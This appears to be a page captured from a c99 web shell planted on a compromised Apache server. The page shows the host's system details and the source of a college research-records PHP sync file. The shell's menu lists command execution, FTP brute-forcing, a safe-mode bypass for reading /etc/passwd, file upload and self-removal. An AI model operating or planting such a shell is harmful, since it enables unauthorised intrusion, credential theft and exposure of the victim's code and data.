!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/includes/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cURLRes.php (11.37 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

require_once("../configuration.php");
require_once(
"../includes/connMySQL.class.php");

$conn = new DBConn();

$sql "select collegeCode from college where collegeStatus = '1'";
$result $conn->execQuery($sql);
$rs $conn->fetchObject($result);
$collegeCode $rs->collegeCode;

function 
curlTestConnection(){
    
    global 
$_Config_research_curl_ip;

    if(
fsockopen($_Config_research_curl_ip80$num$error5)) return true;
    else return 
false;

}

function 
cURL($postfields){

    global 
$_Config_research_curl_path;

    
$curlSendStatus true;
    
    if(
curlTestConnection()){
        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL$_Config_research_curl_path);
        
curl_setopt($chCURLOPT_POST1);
        
curl_setopt($chCURLOPT_POSTFIELDS$postfields);
        
curl_setopt($chCURLOPT_RETURNTRANSFER1);
        
//curl_setopt($ch, CURLOPT_HEADER, true); // Display headers
        //curl_setopt($ch, CURLOPT_VERBOSE, true);
        
$response curl_exec($ch);
        
curl_close($ch);
        
        if(
$response == 1$curlSendStatus true;
        else 
$curlSendStatus false;
    }
    else 
$curlSendStatus false;

    if(
$curlSendStatus) return true;
    else return 
false;
}

//------- Reserch_tb -------//
function rsResearchCurl($Research_code$Research_name$Branch$Research_type$Research_char$Research_char_else$ReFormId$Research_Form_else$Year_prop$ResearchDI$ReTyId$Year_start$Year_finish$Fund_resourceIn$Fund_resourceOut$FundIn$FundOut$FundUse$Resource_des$r_type$academic_year$fiscal_year$academic_year_finish$fiscal_year_finish$Year_sprop){
    
    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['Research_code'] = $Research_code;
    
$postfields['Research_name'] = $Research_name;
    
$postfields['Branch'] = $Branch;
    
$postfields['Research_type'] = $Research_type;
    
$postfields['Research_char'] = $Research_char;
    
$postfields['Research_char_else'] = $Research_char_else ;
    
$postfields['ReFormId'] = $ReFormId ;
    
$postfields['Research_Form_else'] = $Research_Form_else ;
    
$postfields['Year_prop'] = $Year_prop;
    
$postfields['ResearchDI'] = $ResearchDI;
    
$postfields['ReTyId'] = $ReTyId;
    
$postfields['Year_start'] = $Year_start;
    
$postfields['Year_finish'] = $Year_finish;
    
$postfields['Fund_resourceIn'] = $Fund_resourceIn;
    
$postfields['Fund_resourceOut'] = $Fund_resourceOut;
    
$postfields['FundIn'] = $FundIn;
    
$postfields['FundOut'] = $FundOut;
    
$postfields['FundUse'] = $FundUse;
    
$postfields['Resource_des'] = $Resource_des;
    
$postfields['r_type'] = $r_type;
    
$postfields['academic_year'] = $academic_year;
    
$postfields['fiscal_year'] = $fiscal_year;
    
$postfields['academic_year_finish'] = $academic_year_finish;
    
$postfields['fiscal_year_finish'] = $fiscal_year_finish;
    
$postfields['Year_sprope'] = $Year_sprop;
    
$postfields['status'] = "rsResearch";
    

    
$response cURL($postfields);
        
    return 
$response;

}

function 
deleteResearchCurl($Research_code){

    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['Research_code'] = $Research_code;    
    
$postfields['status'] = "deleteResearch";    

    
$response cURL($postfields);
    
    return 
$response;

}

function 
checkResearchCurl($Research_code){
    
    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['Research_code'] = $Research_code;    
    
$postfields['status'] = "checkResearch";
    
    
$response cURL($postfields);
    
    return 
$response;

}

//------- research_public_tb -------//
function rsPublicCurl($RepbCo$Research_code$ReTyId$RePbId1$AreaRePbId1,  $RePbId2,  $AreaRePbId2$RePbId3$AreaRePbId3$RePbId4$AreaRePbId4$RePbId5$AreaRePbId5$RePbId6,  $RePbId7,  $RePbId8$RePbId9$RePbId10$AreaRePbId10$RePbId11){
    
    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['RepbCo'] = $RepbCo;
    
$postfields['Research_code'] = $Research_code;    
    
$postfields['ReTyId'] = $ReTyId;
    
$postfields['RePbId1'] = $RePbId1;
    
$postfields['AreaRePbId1'] = $AreaRePbId1;
    
$postfields['RePbId2'] = $RePbId2;
    
$postfields['AreaRePbId2'] = $AreaRePbId2 ;
    
$postfields['RePbId3'] = $RePbId3;
    
$postfields['AreaRePbId3'] = $AreaRePbId3;
    
$postfields['RePbId4'] = $RePbId4;
    
$postfields['AreaRePbId4'] = $AreaRePbId4;
    
$postfields['RePbId5'] = $RePbId5;
    
$postfields['AreaRePbId5'] = $AreaRePbId5;
    
$postfields['RePbId6'] = $RePbId6;
    
$postfields['RePbId7'] = $RePbId7;
    
$postfields['RePbId8'] = $RePbId8;
    
$postfields['RePbId9'] = $RePbId9;
    
$postfields['RePbId10'] = $RePbId10;
    
$postfields['RePbId11'] = $RePbId11;
    
$postfields['status'] = "rsPublic";

    
$response cURL($postfields);
    
    return 
$response;

}

function 
deletePublicCurl($RepbCo){

    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['RepbCo'] = $RepbCo;
    
$postfields['status'] = "deletePublic";    

    
$response cURL($postfields);
    
    return 
$response;

}

function 
checkPublicCurl($RepbCo){
    
    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['RepbCo'] = $RepbCo;
    
$postfields['status'] = "checkPublic";    

    
$response cURL($postfields);
    
    return 
$response;

}

//-------  research_file_tb -------//
function RsFileCurl($Research_Id$Research_code$importance$objective$scope$receive$quality$abbStract$Filetex){

    global 
$_Config_live_site;
    global 
$ResearchPicPath;
    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['Research_Id'] = $Research_Id;
    
$postfields['Research_code'] = $Research_code;
    
$postfields['importance'] = $importance;    
    
$postfields['objective'] = $objective;
    
$postfields['scope'] = $scope;
    
$postfields['receive'] = $receive;
    
$postfields['quality'] = $quality;
    
$postfields['abbStract'] = $abbStract;
    
$postfields['Filetex'] = $_Config_live_site.str_replace('..'''$ResearchPicPath).$Filetex;
    
$postfields['status'] = "rsFile";

    
$response cURL($postfields);
    
    return 
$response;

}

function 
deleteFileCurl($Research_Id){

    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['$Research_Id'] = $$Research_Id;
    
$postfields['status'] = "deleteFile";    

    
$response cURL($postfields);
    
    return 
$response;

}

function 
checkFileCurl($Research_Id){
    
    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['$Research_Id'] = $$Research_Id;
    
$postfields['status'] = "checkFile";    

    
$response cURL($postfields);
    
    return 
$response;

}

//------- research_success_tb -------//
function RsSuccessCurl($ResuccessId$Research_code$Success$Knowledge$proId$outreacId$outSouse$courseId){
    
    global 
$collegeCode;

    
$postfields['ResuccessId'] = $ResuccessId;
    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['Research_code'] = $Research_code;
    
$postfields['Success'] = $Success;
    
$postfields['Knowledge'] = $Knowledge ;
    
$postfields['proId'] = $proId;
    
$postfields['outreacId'] = $outreacId;
    
$postfields['outSouse'] = $outSouse ;
    
$postfields['courseId'] = $courseId;
    
$postfields['status'] = "rsSuccess";

    
$response cURL($postfields);
    
    return 
$response;

}

function 
deleteSuccessCurl($ResuccessId){

    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['ResuccessId'] = $ResuccessId;
    
$postfields['status'] = "deleteSuccess";    

    
$response cURL($postfields);
    
    return 
$response;

}

function 
checkSuccessCurl($ResuccessId){
    
    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['ResuccessId'] = $ResuccessId;
    
$postfields['status'] = "checkSuccess";    

    
$response cURL($postfields);
    
    return 
$response;

}

 
//------- research_char_tb -------//
function rsCharCurl($RecharId$Research_code$R_position$Teacher_code$persent ){

    global 
$collegeCode;
 
    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['RecharId'] =$RecharId ;
    
$postfields['Research_code'] = $Research_code;
    
$postfields['R_position'] = $R_position;    
    
$postfields['Teacher_code'] = $Teacher_code;
    
$postfields['persent'] = $persent;
    
$postfields['status'] = "rsChar";

    
$response cURL($postfields);

    return 
$response;

}

function 
deleteCharCurl($RecharId){

    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['RecharId'] = $RecharId;
    
$postfields['status'] = "deleteChar";    

    
$response cURL($postfields);
    
    return 
$response;

}

function 
checkCharCurl($RecharId){
    
    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['RecharId'] = $RecharId;
    
$postfields['status'] = "checkChar";    

    
$response cURL($postfields);
    
    return 
$response;

}

//---------------- research_dissemination --------------//
function rsDisseCurl($pubId$Research_code$Feature$Warsan$Quality$Proceeding$Results,  $DatabaseName$JournalName$Year$Issue$Page$fiscal_year_finish$academic_year_finish$MeetingName$Agencies$DatePublic$Filetex){
    
    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['pubId'] = $pubId;
    
$postfields['Research_code'] = $Research_code;    
    
$postfields['Feature'] = $Feature;
    
$postfields['Warsan'] = $Warsan;
    
$postfields['Quality'] = $Quality;
    
$postfields['Proceeding'] = $Proceeding ;
    
$postfields['Results'] = $Results ;
    
$postfields['DatabaseName'] = $DatabaseName;
    
$postfields['JournalName'] = $JournalName;
    
$postfields['Year'] = $Year;
    
$postfields['Issue'] = $Issue;
    
$postfields['Page'] = $Page;
    
$postfields['fiscal_year_finish'] = $fiscal_year_finish;
    
$postfields['academic_year_finish'] = $academic_year_finish;
    
$postfields['MeetingName'] = $MeetingName;
    
$postfields['Agencies'] = $Agencies;
    
$postfields['DatePublic'] = $DatePublic;
    
$postfields['Filetex'] = $Filetex;
    
$postfields['status'] = "rsDisse";

    
$response cURL($postfields);
    
    return 
$response;

}

function 
deleteDisseCurl($pubId){

    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['pubId'] = $pubId;
    
$postfields['status'] = "deleteDisse";    

    
$response cURL($postfields);
    
    return 
$response;

}

function 
checkDisseCurl($pubId){
    
    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['pubId'] = $pubId;
    
$postfields['status'] = "checkDisse";    

    
$response cURL($postfields);
    
    return 
$response;

}

//---------- research_filetex_tb ----------//
function rsFiletexCurl($Research_Id$Research_code$Filename$Filetex){

    global 
$_Config_live_site;
    global 
$ResearchPicPath;
    global 
$collegeCode;

    
$postfields['Research_Id'] = $Research_Id;
    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['Research_code'] = $Research_code;
    
$postfields['Filename'] = $Filename;    
    
$postfields['Filetex'] = $_Config_live_site.str_replace('..'''$ResearchPicPath).$Filetex;
    
$postfields['status'] = "rsFiletex";

    
$response cURL($postfields);
    
    return 
$response;

}

function 
deleteFiletexCurl($Research_Id){

    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['Research_Id'] = $Research_Id;
    
$postfields['status'] = "deleteFiletex";    

    
$response cURL($postfields);
    
    return 
$response;

}

function 
checkFiletexCurl($Research_Id){
    
    global 
$collegeCode;

    
$postfields['collegeCode'] = $collegeCode;
    
$postfields['Research_Id'] = $Research_Id;
    
$postfields['status'] = "checkFiletex";    

    
$response cURL($postfields);
    
    return 
$response;

}


?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0168 ]--